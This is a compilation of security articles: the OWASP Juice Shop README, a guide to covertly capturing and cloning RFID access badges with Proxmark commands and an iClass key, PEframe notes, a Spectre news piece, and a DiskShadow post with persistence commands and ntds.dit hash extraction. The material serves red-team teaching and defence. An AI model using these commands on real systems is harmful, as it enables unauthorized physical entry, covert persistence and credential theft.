The most trustworthy online shop out there. (@dschadow) — The best juice shop on the whole internet! (@shehackspurple) — Actually the most bug-free vulnerable application in existence! (@vanderaj)

OWASP Juice Shop is an intentionally insecure web application written entirely in JavaScript which encompasses the entire range of the OWASP Top Ten and other severe security flaws. For a detailed introduction, full list of features and architecture overview please visit the official project page: http://owasp-juice.shop

Setup

Deploy on Heroku (free ($0/month) dyno)
1. Sign up to Heroku and log in to your account
2. Click the button below and follow the instructions
This is the quickest way to get a running instance of Juice Shop! If you have forked this repository, the deploy button will automatically pick up your fork for deployment! As long as you do not perform any DDoS attacks you are free to use any tools or scripts to hack your Juice Shop instance on Heroku!

From Sources
1. Install node.js
2. Run git clone https://github.com/bkimminich/juice-shop.git (or clone your own fork of the repository)
3. Go into the cloned folder with cd juice-shop
4. Run npm install (only has to be done before first start or when you change the source code)
5. Run npm start
6. Browse to http://localhost:3000

Packaged Distributions
1. Install a 64bit node.js on your Windows (or Linux) machine
2. Download juice-shop-<version>_<node-version>_<os>_x64.zip (or .tgz) attached to the latest release
3. Unpack and cd into the unpacked folder
4. Run npm start
5. Browse to http://localhost:3000
Each packaged distribution includes some binaries for SQLite bound to the OS and node.js version which npm install was executed on.
Docker Container
1. Install Docker
2. Run docker pull bkimminich/juice-shop
3. Run docker run --rm -p 3000:3000 bkimminich/juice-shop
4. Browse to http://localhost:3000 (on macOS and Windows browse to http://192.168.99.100:3000 if you are using docker-machine instead of the native docker installation)

If you want to run Juice Shop on a Raspberry Pi 3, there is an unofficial Docker image available at https://hub.docker.com/r/arclight/juice-shop_arm which is based on resin/rpi-raspbian and maintained by @battletux.

Even easier: Run Docker Container from Docker Toolbox (Kitematic)
1. Install and launch Docker Toolbox
2. Search for juice-shop and click Create to download the image and run the container
3. Click on the Open icon next to Web Preview to browse to OWASP Juice Shop

Deploy to Docker Cloud (🔬)
1. Click the button below and follow the instructions
This (🔬) is an experimental deployment option! Your feedback is appreciated at https://gitter.im/bkimminich/juice-shop.

Vagrant
1. Install Vagrant and Virtualbox
2. Run git clone https://github.com/bkimminich/juice-shop.git (or clone your own fork of the repository)
3. Run cd vagrant && vagrant up
4. Browse to 192.168.33.10

Amazon EC2 Instance
1. Setup an Amazon Linux AMI instance
2. In Step 3: Configure Instance Details unfold Advanced Details and copy the script below into User Data
3. In Step 6: Configure Security Group add a Rule that opens port 80 for HTTP
4. Launch instance
5. Browse to your instance's public DNS

#!/bin/bash
yum update -y
yum install -y docker
service docker start
docker pull bkimminich/juice-shop
docker run -d -p 80:3000 bkimminich/juice-shop

Technically Amazon could view hacking activity on any EC2 instance as an attack on their AWS infrastructure! We highly discourage aggressive scanning or automated brute force attacks! You have been warned!

Azure Web App for Containers
1. Open your Azure CLI or login to the Azure Portal, open the CloudShell and then choose Bash (not PowerShell).
2. Create a resource group by running az group create --name <group name> --location <location name, e.g. "East US">
3. Create an app service plan by running az appservice plan create --name <plan name> --resource-group <group name> --sku S1 --is-linux
4. Create a web app with the Juice Shop Docker image by running the following (on one line in the bash shell): az webapp create --resource-group <group name> --plan <plan name> --name <app name> --deployment-container-image-name bkimminich/juice-shop

For more information please refer to the detailed walkthrough with screenshots by @JasonHaley. You can alternatively follow his guide to set up OWASP Juice Shop as an Azure Container Instance.

Node.js version compatibility

OWASP Juice Shop officially supports the following versions of node.js, in line as close as possible with the official node.js LTS schedule. Docker images and packaged distributions are offered accordingly:

node.js | Docker image | Packaged distributions
9.x | latest (current official release), snapshot (preview from develop branch) | juice-shop-<version>_node9_windows_x64.zip, juice-shop-<version>_node9_linux_x64.tgz
8.x | — | juice-shop-<version>_node8_windows_x64.zip, juice-shop-<version>_node8_linux_x64.tgz

Demo

Feel free to have a look at the latest version of OWASP Juice Shop: http://demo.owasp-juice.shop
This is a deployment-test and sneak-peek instance only! You are not supposed to use this instance for your own hacking endeavours! No guaranteed uptime! Guaranteed stern looks if you break it!

Customization

Via a YAML configuration file in /config, the OWASP Juice Shop can be customized in its content and look & feel. For detailed instructions and examples please refer to our Customization documentation.

CTF-Extension

If you want to run OWASP Juice Shop as a Capture-The-Flag event, we recommend you set it up along with a CTFd server conveniently using the official juice-shop-ctf-cli tool.
For step-by-step instructions and examples please refer to the Hosting a CTF event chapter of our companion guide ebook.

XSS Demo

To show the possible impact of XSS, you can download this docker-compose file and run docker-compose up to start the juice-shop and the shake-logger. Assume you received and (of course) clicked this inconspicuous phishing link and logged in. Apart from the visual/audible effect, the attacker also installed an input logger to grab credentials! This could easily run on a 3rd party server in real life! You can also find a recording of this attack in action on YouTube: 📺

Additional Documentation

Pwning OWASP Juice Shop

This is the official companion guide to the OWASP Juice Shop. It will give you a complete overview of the vulnerabilities found in the application, including hints how to spot and exploit them. In the appendix you will even find complete step-by-step solutions to every challenge. Pwning OWASP Juice Shop is published with GitBook under CC BY-NC-ND 4.0 and is available for free in PDF, Kindle and ePub format. You can also browse the full content online!

Slide Decks
- Introduction Slide Deck in HTML5
- PDF of the Intro Slide Deck on Slideshare

Troubleshooting

If you need help with the application setup please check the TROUBLESHOOTING.md or post your specific problem or question in the official Gitter Chat.

Contributing

We are always happy to get new contributors on board! Please check the following for possible ways to do so:
- Found a bug? Crashed the app? Broken challenge? Found a vulnerability that is not on the Score Board? Create an issue or post your ideas in the chat
- Want to help with development? Pull requests are highly welcome! Please refer to the Contribute to development and Codebase 101 chapters of our companion guide ebook
- Want to help with internationalization? Find out how to join our Crowdin project in the Helping with translations documentation
- Anything else you would like to contribute?
Write an email to owasp_juice_shop_project@lists.owasp.org or bjoern.kimminich@owasp.org

References

Did you write a blog post, magazine article or do a podcast about or mentioning OWASP Juice Shop? Or maybe you held or joined a conference talk or meetup session, a hacking workshop or public training where this project was mentioned? Add it to our ever-growing list of REFERENCES.md by forking and opening a Pull Request!

Merchandise
- On Spreadshirt.com and Spreadshirt.de you can get some swag (Shirts, Hoodies, Mugs) with the official OWASP Juice Shop logo
- On StickerYou.com you can get variants of the OWASP Juice Shop logo as single stickers to decorate your laptop with. They can also print magnets, iron-ons, sticker sheets and temporary tattoos.

The most honorable way to get some stickers is to contribute to the project by fixing an issue, finding a serious bug or submitting a good idea for a new challenge! We're also happy to supply you with stickers if you organize a meetup or conference talk where you use or talk about or hack the OWASP Juice Shop! Just contact the mailing list or the project leader to discuss your plans!

Donations

PayPal: donations via the PayPal button go to the OWASP Foundation and are earmarked for "Juice Shop". This is the preferred and most convenient way to support the project.
Credit Card (through RegOnline): OWASP hosts a donation form on RegOnline. Refer to the Credit card donation step-by-step guide for help with filling out the donation form correctly.
Crypto Currency

Contributors

The OWASP Juice Shop core project team are:
- Björn Kimminich aka bkimminich (Project Leader)
- Jannik Hollenbach aka J12934
- Timo Pagel aka wurstbrot

For a list of all contributors to the OWASP Juice Shop please visit our HALL_OF_FAME.md.

Licensing

This program is free software: you can redistribute it and/or modify it under the terms of the MIT license. OWASP Juice Shop and any contributions are Copyright © by Bjoern Kimminich 2014-2018.
Sursa: https://github.com/bkimminich/juice-shop
RFID Thief v2.0
12 Jul 2018 » all, rfid, tutorial

Table of Contents
- Overview
- Proxmark 3
- Long Range Readers
- Wiegotcha
- Raspberry Pi Setup
- Wiring
  - Raspberry Pi
  - HID iClass R90
  - HID Indala ASR620
  - HID MaxiProx 5375
  - Controller (Optional)
- Tutorial
  - iClass R90
  - Indala ASR620
  - MaxiProx 5375
- Components
- References

Overview

This post will outline how to build and use long range RFID readers to clone iClass, Indala & Prox cards used for Access Control.

Proxmark 3

If you are unfamiliar with the Proxmark 3, it is a general purpose RFID cloning tool, equipped with a high and low frequency antenna to snoop, listen, clone and emulate RFID cards. There are currently 4 versions of the Proxmark 3 (RDV1, RDV2, RDV3 and RDV4); all use the same firmware and software, however some have more/less hardware features.

Long Range Readers

There are 3 main types of long range readers HID sell: the R90, ASR-620 and MaxiProx 5375. Each reader supports a different type of card:
- HID iClass R90: iClass Legacy (13.56 MHz)
- HID Indala ASR-620: Indala 26bit (125 kHz)
- HID MaxiProx 5375: ProxCard II (125 kHz)

Wiegotcha

Wiegotcha is the awesome software for the Raspberry Pi developed by Mike Kelly that improves upon the Tastic RFID Thief in the following areas:
- Acts as a wireless AP with a simple web page to display captured credentials.
- Automatically calculates the iClass Block 7 data for cloning.
- Uses a hardware clock for accurate timestamps.
- AIO solution, eliminates the need for custom PCBs and multiple breakout boards.
- Utilizes an external rechargeable battery.

Raspberry Pi Setup

This build will make use of the Raspberry Pi 3 to receive the raw Wiegand data from the long range readers and provide an access point to view/save the collected data.

MicroSD Card Setup
1. Download and extract Raspbian Stretch.
2. Download etcher or any disk writer you prefer.
3. Write the Raspbian Stretch .img file to the MicroSD card using a USB adapter.
4. Unplug and replug the USB adapter to see the 'boot' drive.
5. Edit cmdline.txt and add modules-load=dwc2,g_ether after the word rootwait so that it looks like this:
dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 root=PARTUUID=9cba179a-02 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait modules-load=dwc2,g_ether quiet init=/usr/lib/raspi-config/init_resize.sh splash plymouth.ignore-serial-consoles
6. Edit config.txt and append dtoverlay=dwc2 to the end of the file.
7. Create a blank file within the 'boot' directory called ssh.

Raspberry Pi Configuration
1. Connect the RPi to your local network and ssh to it using the default password raspberry.
2. Run sudo su to become the root user.
3. Clone the Wiegotcha repository to the /root directory:
cd /root
git clone https://github.com/lixmk/Wiegotcha
4. Run the install script in the Wiegotcha directory:
cd Wiegotcha
./install.sh
5. Follow the prompts as requested; the RPi will reboot once completed. Be patient, this process can take some time.
6. After reboot, reconnect to the RPi using ssh and enter the following:
sudo su
screen -dr install
7. The RPi will reboot and the installation is completed.

The RPi will now broadcast with the ESSID Wiegotcha; you can connect to it using the passphrase Wiegotcha. Wiegotcha assigns the static IP 192.168.150.1 to the RPi.

Wiring

Each reader will require a Bi-Directional Logic Level Converter; this is used to convert the 5v Wiegand output from the readers to the 3.3v RPi GPIOs. For quality of life, I have added JST SM connectors allowing quick interchangeability between the different long range readers. You may choose to add another external controller with switches to power the readers on/off, enable/disable sound or vibration, however this is optional.
The following is a general overview of how the components are connected together:

RPi GPIO Pins 1,3,5,7,9 -> Hardware RTC

RPi to Logic Level Converter:
- GPIO Pin 4 -> LLC HV
- GPIO Pin 6 -> LLC LV GND
- GPIO Pin 11 -> LLC LV 1
- GPIO Pin 12 -> LLC LV 4
- GPIO Pin 17 -> LLC LV

Long Range Reader to Logic Level Converter:
- LRR DATA 0 (Green) -> LLC HV 1
- LRR DATA 1 (White) -> LLC HV 4
- LRR SHIELD -> LLC HV GND

Raspberry Pi
1. Connect the Hardware RTC to GPIO pins 1,3,5,7,9.
2. Solder female jumper wires to a male JST SM connector according to the table below and connect to the RPi.
RPi -> JST SM Connector:
- GPIO Pin 4 -> Blue
- GPIO Pin 6 -> Black
- GPIO Pin 11 -> Green
- GPIO Pin 12 -> White
- GPIO Pin 17 -> Red

HID iClass R90
1. Join wires from the HID R90 to the logic level converter according to the table below.
HID R90 -> Logic Level Converter:
- P1-6 (DATA 0) -> HV 1
- P1-7 (DATA 1) -> HV 4
- P2-2 (GROUND/SHIELD) -> HV GND
2. Solder female jumper wires from the logic level converter to a female JST SM connector according to the table below.
Logic Level Converter -> JST SM Connector:
- LV -> Red
- LV GND -> Black
- LV 1 -> Green
- LV 4 -> White
- HV -> Blue
3. Join Positive and Negative cables from the HID R90 to a DC connector/adapter.
HID R90 -> DC Connector/Adapter:
- P2-1 -> Positive (+)
- P1-5 -> Negative (-)

HID Indala ASR620

The Indala ASR620 will have a wiring harness from factory that you can utilize; the shield wire is within the harness itself, so you need to slice a portion of the harness to expose it.
1. Splice and solder wires from the Indala ASR620 to the logic level converter according to the table below.
Indala ASR620 -> Logic Level Converter:
- Green (DATA 0) -> HV 1
- White (DATA 1) -> HV 4
- Shield -> HV GND
2. Solder female jumper wires from the logic level converter to a female JST SM connector according to the table below.
Logic Level Converter -> JST SM Connector:
- LV -> Red
- LV GND -> Black
- LV 1 -> Green
- LV 4 -> White
- HV -> Blue
3. Join Positive and Negative cables from the Indala ASR620 to a DC connector/adapter.
Indala ASR620 -> DC Connector/Adapter:
- Red -> Positive (+)
- Black -> Negative (-)

HID MaxiProx 5375
1. Join wires from the MaxiProx 5375 to the logic level converter according to the table below.
MaxiProx 5375 -> Logic Level Converter:
- TB2-1 (DATA 0) -> HV 1
- TB2-2 (DATA 1) -> HV 4
- TB1-2 (SHIELD) -> HV GND
2. Solder female jumper wires from the logic level converter to a female JST SM connector according to the table below.
Logic Level Converter -> JST SM Connector:
- LV -> Red
- LV GND -> Black
- LV 1 -> Green
- LV 4 -> White
- HV -> Blue
3. Join Positive and Negative cables from the MaxiProx 5375 to a DC connector/adapter.
MaxiProx 5375 -> DC Connector/Adapter:
- TB1-1 -> Positive (+)
- TB1-3 -> Negative (-)

Controller

Hearing a loud beep from your backpack when you intercept a card is probably not good. To avoid this, I made a makeshift controller to easily power on/off and switch between sound, vibration or both. Each long range reader contains a sound buzzer either soldered or wired to the board (on-board for the HID iClass R90 and MaxiProx 5375; external for the HID Indala ASR-620); you can de-solder and replace this with extended wires to the controller. Within the makeshift controller you can splice/solder a sound buzzer (reuse the readers'), a vibrating mini motor disc, switches and a voltage display.

Tutorial

This section will show you how to clone the intercepted cards from the long range readers using the Proxmark 3.

iClass R90

iClass Legacy cards are encrypted using a master authentication key and TDES keys. The master authentication key allows you to read and write the encrypted blocks of the card; however, you will require the TDES keys to encrypt or decrypt each block. You can find the master authentication key in my Proxmark 3 Cheat Sheet post & step 6 of this tutorial. The TDES keys are not publicly available; you will have to source them yourself using the Heart of Darkness paper. The R90 will read the card, decrypt it and send the Wiegand data to Wiegotcha.

1. Assemble/power on the components and connect to the RPi access point Wiegotcha.
2. Navigate to http://192.168.150.1 via browser.
3. Place/intercept an iClass Legacy card on the long range reader.
4. Copy the data from the Block 7 column into clipboard.
5. Encrypt the Block 7 data using the Proxmark 3:
# Connect to the Proxmark 3
./proxmark3 /dev/ttyACM0
# Encrypt Block 7 data
hf iclass encryptblk 0000000b2aa3dd88
6. Write the encrypted Block 7 data to a writable iClass card:
hf iclass writeblk b 07 d 26971075da43c659 k AFA785A7DAB33378
7. Done! If it all worked correctly, your cloned card will have the same Block 7 data as the original. You can confirm with the following:
hf iclass dump k AFA785A7DAB33378

Indala ASR620
1. Assemble/power on the components and connect to the RPi access point Wiegotcha.
2. Navigate to http://192.168.150.1 via browser.
3. Place/intercept an Indala card on the long range reader.

MaxiProx 5375
1. Assemble/power on the components and connect to the RPi access point Wiegotcha.
2. Navigate to http://192.168.150.1 via browser.
3. Place/intercept a ProxCard II card on the long range reader.
4. Copy the data from the Proxmark Hex column into clipboard.
5. Clone the Proxmark Hex data to a T5577 card using the Proxmark 3:
# Connect to the Proxmark 3
./proxmark3 /dev/ttyACM0
# Clone Proxmark Hex data
lf hid clone 2004060a73
6. Done! If it all worked correctly, your cloned card will have the same Proxmark Hex, FC & SC data as the original. You can confirm with the following:
lf search

Components

Most of the components can be found cheaply on eBay or your local electronics store; the most expensive components are the long range readers and the Proxmark 3.
- Raspberry Pi 3
- Proxmark 3 RDV2
- 12v USB Power Bank
- HID iClass R90
- HID Indala ASR-620
- HID MaxiProx 5375
- Bi-Directional Logic Level Converter
- DS3231 RTC Real Time Clock
- Vibrating Mini Motor Disc
- 32GB MicroSD Card
- JST SM 5 Pin Connectors
- JST SM 4 Pin Connectors

References
- Official Proxmark 3 Repository
- Official Proxmark 3 Forums
- Mike Kelly's Blog
- Wiegotcha Github
- Tastic RFID Thief

Sursa: https://scund00r.com/all/rfid/tutorial/2018/07/12/rfid-theif-v2.html
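As background to the Wiegand data these readers hand to Wiegotcha: ProxCard II badges typically use the 26-bit H10301 format — one even-parity bit, an 8-bit facility code, a 16-bit card number, and one odd-parity bit. A minimal decoder sketch (the function name is mine, not from the post):

```python
def decode_h10301(bits: str):
    """Decode a 26-bit HID H10301 Wiegand frame.

    Layout: [even parity][8-bit facility code][16-bit card number][odd parity].
    Returns (facility_code, card_number, parity_ok).
    """
    assert len(bits) == 26 and set(bits) <= {"0", "1"}
    fc = int(bits[1:9], 2)                    # 8-bit facility code
    cn = int(bits[9:25], 2)                   # 16-bit card number
    even_ok = bits[:13].count("1") % 2 == 0   # even parity over first 13 bits
    odd_ok = bits[13:].count("1") % 2 == 1    # odd parity over last 13 bits
    return fc, cn, even_ok and odd_ok

# Build a frame for facility code 32, card number 1234 and decode it back.
data = format(32, "08b") + format(1234, "016b")
frame = ("1" if data[:12].count("1") % 2 else "0") + data + \
        ("0" if data[12:].count("1") % 2 else "1")
print(decode_h10301(frame))  # → (32, 1234, True)
```

Wiegotcha performs this kind of decoding (and the iClass Block 7 calculation) for you; the sketch just shows what the FC/SC columns on its web page are derived from.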
PEframe 5.0.1

PEframe is an open source tool to perform static analysis on Portable Executable malware and generic suspicious files. It can help malware researchers to detect packers, XOR, digital signatures, mutexes, anti-debug and anti-VM tricks, suspicious sections and functions, and much more information about suspicious files. Documentation will be available soon.

Usage
$ peframe <filename>            Short output analysis
$ peframe --json <filename>     Full output analysis, JSON format
$ peframe --strings <filename>  Strings output

You can edit the stringsmatch.json file to configure your fuzzer and VirusTotal API key.

Output example: Short data example | Full data (JSON) example

Install

Prerequisites: Python 2.7.x

To install from PyPI:
# pip install https://github.com/guelfoweb/peframe/archive/master.zip

To install from source:
$ git clone https://github.com/guelfoweb/peframe.git
$ cd peframe
# python setup.py install

Sursa: https://github.com/guelfoweb/peframe
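The usage above can also be scripted for batch triage. A hedged sketch — it assumes peframe is installed and on PATH, and `sample.exe` is a placeholder path — that builds the command line and (optionally) parses the JSON report:

```python
import json
import subprocess

def peframe_cmd(path, mode=None):
    """Build the peframe command line for the given output mode
    (None for short output, "json" or "strings" as documented above)."""
    cmd = ["peframe"]
    if mode in ("json", "strings"):
        cmd.append("--" + mode)
    cmd.append(path)
    return cmd

print(peframe_cmd("sample.exe", "json"))  # → ['peframe', '--json', 'sample.exe']

# With peframe installed, the JSON report could then be loaded like this:
# result = subprocess.run(peframe_cmd("sample.exe", "json"),
#                         capture_output=True, text=True)
# report = json.loads(result.stdout)
```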
New Spectre variants earn $100,000 bounty from Intel Researchers discovered two new Spectre variants that can be used to bypass protections and attack systems and earned $100,000 in bug bounties from Intel. Michael Heller Senior Reporter 13 Jul 2018 Researchers found new speculative execution attacks against Intel and ARM chips, and the findings earned them a $100,000 reward under Intel's bug bounty. The new methods are themselves variations on Spectre v1 -- the bounds check bypass version of Spectre attacks -- and are being tracked as Spectre variants 1.1 and 1.2. The new Spectre 1.1 has also earned a new Common Vulnerabilities and Exposures (CVE) number, CVE-2018-3693, because it "leverages speculative stores to create speculative buffer overflows" according to Vladimir Kiriansky, a doctoral candidate in electrical engineering and computer science at MIT, and Carl Waldspurger of Carl Waldspurger Consulting. "Much like classic buffer overflows, speculative out-of-bounds stores can modify data and code pointers. Data-value attacks can bypass some Spectre v1 mitigations, either directly or by redirecting control flow. Control-flow attacks enable arbitrary speculative code execution, which can bypass fence instructions and all other software mitigations for previous speculative-execution attacks. It is easy to construct return-oriented-programming gadgets that can be used to build alternative attack payloads," Kiriansky and Waldspurger wrote in their research paper. "In a speculative data attack, an attacker can (temporarily) overwrite data used by a subsequent Spectre 1.0 gadget." Spectre 1.2 does not have a new CVE because it "relies on lazy enforcement" of read/write protections. "Spectre 1.2 [is] a minor variant of Spectre v1, which depends on lazy PTE enforcement, similar to Spectre v3," the researchers wrote. 
"In a Spectre 1.2 attack, speculative stores are allowed to overwrite read-only data, code pointers and code metadata, including v-tables [virtual tables], GOT/IAT [global offset table/import address table] and control-flow mitigation metadata. As a result, sandboxing that depends on hardware enforcement of read-only memory is rendered ineffective."

As the research paper from Kiriansky and Waldspurger went live, Intel paid them a $100,000 bug bounty for the new Spectre variants. After the initial announcement of the Spectre and Meltdown vulnerabilities in January 2018, Intel expanded its bug bounty program to include rewards of up to $250,000 for similar side-channel attacks.

"When implemented properly, bug bounties help both businesses and the research community, as well as encourage more security specialists to participate in the audit and allow CISOs to optimize their security budgets for wider security coverage," Nick Bilogorskiy, cybersecurity strategist at Juniper Networks, wrote via email. "These bugs are new minor variants of the original Spectre variant one vulnerability and have similar impact. They exploit speculative execution and allow speculative buffer overflows. I expect that more variants of Spectre and/or Meltdown will continue to be discovered in the future."

ARM and Intel did not respond to requests for comment at the time of this post. ARM did update its FAQ about speculative processor vulnerabilities to reflect the new Spectre variants. And Intel published a white paper regarding bounds check bypass vulnerabilities at the same time as the disclosure of the new Spectre variants. In it, Intel did not mention plans for a new patch but gave guidance to developers to ensure bounds checks are implemented properly in software as a way to mitigate the new issues.
Advanced Micro Devices was not directly mentioned by the researchers in connection with the new Spectre variants, but Spectre v1 did affect AMD chips. AMD has not made a public statement about the new research.

Source: https://searchsecurity.techtarget.com/news/252444914/New-Spectre-variants-earn-100000-bounty-from-Intel?utm_campaign=ssec_security&utm_medium=social&utm_source=twitter&utm_content=1531504414
-
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction

March 26, 2018 ~ bohops

[Source: blog.microsoft.com]

Introduction

Not long ago, I blogged about Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction. This tool was quite interesting because it was yet another utility to perform volume shadow copy operations, and it had a few other features that could potentially support other offensive use cases. In fairness, evasion and persistence are probably not the strong suits of Vshadow.exe, but some of those use cases may have more relevance in its replacement – DiskShadow.exe. In this post, we will discuss DiskShadow, present relevant features and capabilities for offensive opportunities, and highlight IOCs for defensive considerations.

*Don't mind the ridiculous title – it just seemed thematic 🙂

What is DiskShadow?

"DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode." – Microsoft Docs

DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary. The VSS features of DiskShadow require privileged-level access (with UAC elevation); however, several command utilities can be invoked by a non-privileged user. This makes DiskShadow a very interesting candidate for command execution and evasive persistence.

DiskShadow Command Execution

As a feature, the interactive command interpreter and script mode support the EXEC command. As a privileged or an unprivileged user, commands and batch scripts can be invoked within Interactive Mode or via a script file.
Let's demonstrate each of these capabilities:

Note: The proceeding example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail.

Interactive Mode

In the following example, a normal user invokes calc.exe:

Script Mode

In the following example, a normal user invokes calc.exe and notepad.exe by calling the script option with diskshadow.txt:

diskshadow.exe /s c:\test\diskshadow.txt

Like Vshadow, take note that DiskShadow.exe is the parent process of the spawned executable. Additionally, DiskShadow will continue to run until its child processes are finished executing.

Auto-Start Persistence & Evasion

Since DiskShadow is a Windows signed binary, let's take a look at a few AutoRuns implications for persistence and evasion. In the proceeding examples, we will update our script, then create a Run key and a Scheduled Task.

Preparation

Since DiskShadow is "window forward" (e.g. pops a command window), we will need to modify our script in a way to invoke proof-of-concept pass-thru execution and close the parent DiskShadow and subsequent payloads as quickly as possible. In some cases, this technique may not be considered very stealthy if the window is opened for a lengthy period of time (which is good for defenders if this activity is noted and reported by users). However, this may be overlooked if users are conditioned to see such prompts at logon time.

Note: The proceeding example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail.
First, let's modify our script (diskshadow.txt) to demonstrate this basic technique:

EXEC "cmd.exe" /c c:\test\evil.exe

*In order to support command switches, we must quote the initial binary with EXEC. This also works under Interactive Mode.

Second, let's add persistence with the following commands:

- Run Key Value -

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt"

- User Level Scheduled Task -

schtasks /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt"

Let's take a further look at these…

AutoRuns – Run Key Value

After creating the key value, we can see that our key is hidden when we open up AutoRuns and select the Logon tab. By default, Windows signed executables are hidden from view (with a few notable exceptions) as demonstrated in this screenshot:

After de-selecting "Hide Windows Entries", we can see the AutoRuns entry:

AutoRuns – Scheduled Tasks

Like the Run Key method, we can see that our entry is hidden in the default AutoRuns view:

After de-selecting "Hide Windows Entries", we can see the AutoRuns entry:

Extracting the Active Directory Database

Since we are discussing the usage of a shadow copy tool, let's move forward to showcase (yet another) VSS method for extracting the Active Directory (AD) database – ntds.dit. In the following walk-through, we will assume successful compromise of an Active Directory Domain Controller (Win2k12) and are running DiskShadow under a privileged context in Script Mode.

First, let's prepare our script. We have performed some initial recon to determine our target drive letter (for the logical drive that 'contains' the AD database) to shadow, as well as discovered a logical drive letter that is not in use on the system.
Here is the DiskShadow script (diskshadow.txt):

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset

[Helpful Source: DataCore]

In this script, we create a persistent shadow copy so that we can perform copy operations to capture the sensitive target file. By mounting a (unique) logical drive, we can guarantee a copy path for our target file, which we will extract to the 'exfil' directory before deleting our shadow copy identified by someAlias.

*Note: We can attempt to copy out the target file by specifying a shadow device name/unique identifier. This is slightly stealthier, but it is important to ensure that labels/UUIDs are correct (via initial recon) or else the script will fail to run. This use case may be more suitable for Interactive Mode.

The commands and results of the DiskShadow operation are presented in this screenshot:

type c:\diskshadow.txt
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil

In addition to the AD database, we will also need to extract the SYSTEM registry hive:

reg.exe save hklm\system c:\exfil\system.bak

After transferring these files from the target machine, we use SecretsDump.py to extract the NTLM hashes:

secretsdump.py -ntds ntds.dit -system system.bak LOCAL

Success! We have used another method to extract the AD database and hashes. Now, let's compare and contrast DiskShadow and Vshadow…

DiskShadow vs. Vshadow

DiskShadow.exe and VShadow.exe have very similar capabilities. However, there are a few differences between these applications that may justify which one is the better choice for the intended operational use case. Let's explore some of these in greater detail:

Operating System Inclusion

DiskShadow.exe has been included with the Windows Server operating system since 2008. Vshadow.exe is included with the Windows SDK.
Unless the target machine has the Windows SDK installed, Vshadow.exe must be uploaded to the target machine. In a "living off the land" scenario, DiskShadow.exe has the clear advantage.

Utility & Usage

Under the context of a normal user in our test case, we can use several DiskShadow features without privilege (UAC) implications. In my previous testing, Vshadow had privilege constraints (e.g. external command execution could only be invoked after running a VSS operation). Additionally, DiskShadow is flexible with command switch support as previously described. DiskShadow.exe has the advantage here.

Command Line Orientation

Vshadow is "command line friendly" while DiskShadow requires use by interactive prompt or script file. Unless you have (remote) "TTY" access to a target machine, DiskShadow's interactive prompt may not be suitable (e.g. for some backdoor shells). Additionally, there is an increased risk for detection when creating files or uploading files to a target machine. In the strict confines of this scenario, Vshadow has the advantage (although creating a text file will likely have less impact than uploading a binary – refer to the previous section).

AutoRuns Persistence & Evasion

In the previous Vshadow blog post, you may recall that Vshadow is signed with the Microsoft signing certificate. This has AutoRuns implications such that it will appear within the Default View since Microsoft signed binaries are not hidden. Since DiskShadow is signed with the Windows certificate, it is hidden from the default view. In this scenario, DiskShadow has the advantage.

Active Directory Database Extraction

If script mode is the only option for DiskShadow usage, extracting the AD database may require additional operations if assumed defaults are not valid (e.g. the Shadow Volume disk name is not what we expected). Aside from crafting and running the script, a logical drive may have to be mapped on the target machine to copy out ntds.dit.
This does add an additional level of noise to the shadow copy operation. Vshadow has the advantage here.

Conclusion

All things considered, DiskShadow seems to be more compelling for operational use. However, that does not discount Vshadow (and other VSS methods for that matter) as a prospective tool used by threat agents. Vshadow has been used maliciously in the past for other reasons.

For DiskShadow, Blue Teams and Network Defenders should consider the following:

- Monitor the Volume Shadow Service (VSS) for random shadow creations/deletions and any activity that involves the AD database file (ntds.dit).
- Monitor for suspicious instances of System Event ID 7036 ("The Volume Shadow Copy service entered the running state") and invocation of the VSSVC.exe process.
- Monitor process creation events for diskshadow.exe and spawned child processes.
- Monitor for process integrity. If diskshadow.exe runs at a medium integrity, that is likely a red flag.
- Monitor for instances of diskshadow.exe on client endpoints. Unless there is a business need, diskshadow.exe *should* not be present on client Windows operating systems.
- Monitor for new and interesting logical drive mappings.
- Inspect suspicious "AutoRuns" entries. Scrutinize signed binaries and inspect script files.
- Enforce Application Whitelisting. Strict policies may prevent DiskShadow pass-thru applications from executing.
- Fight the good fight, and train your users. If they see something (e.g. a weird pop-up window), they should say something!

As always, if you have questions or comments, feel free to reach out to me here or on Twitter. Thank you for taking the time to read about DiskShadow!

Source: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
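The process-creation monitoring suggested for defenders above can be sketched as a simple log filter. This is a toy illustration only: the event-record layout below is invented for the example (it is not a real Sysmon or EDR schema), and a production detection would run against your actual telemetry pipeline:

```python
SUSPECT_IMAGE = "diskshadow.exe"

def flag_diskshadow(events):
    """Return process-creation events worth a closer look: any diskshadow.exe
    launch, annotated with extra reasons (script mode, medium integrity)."""
    hits = []
    for ev in events:
        if not ev.get("image", "").lower().endswith(SUSPECT_IMAGE):
            continue
        hit = dict(ev)  # don't mutate the caller's record
        hit["reasons"] = []
        if "/s" in hit.get("cmdline", "").lower():
            hit["reasons"].append("script mode (/s)")
        if hit.get("integrity") == "Medium":
            # Per the post, diskshadow.exe at medium integrity is a red flag.
            hit["reasons"].append("medium integrity")
        hits.append(hit)
    return hits

# Hypothetical process-creation records for demonstration.
events = [
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"image": r"C:\Windows\System32\diskshadow.exe",
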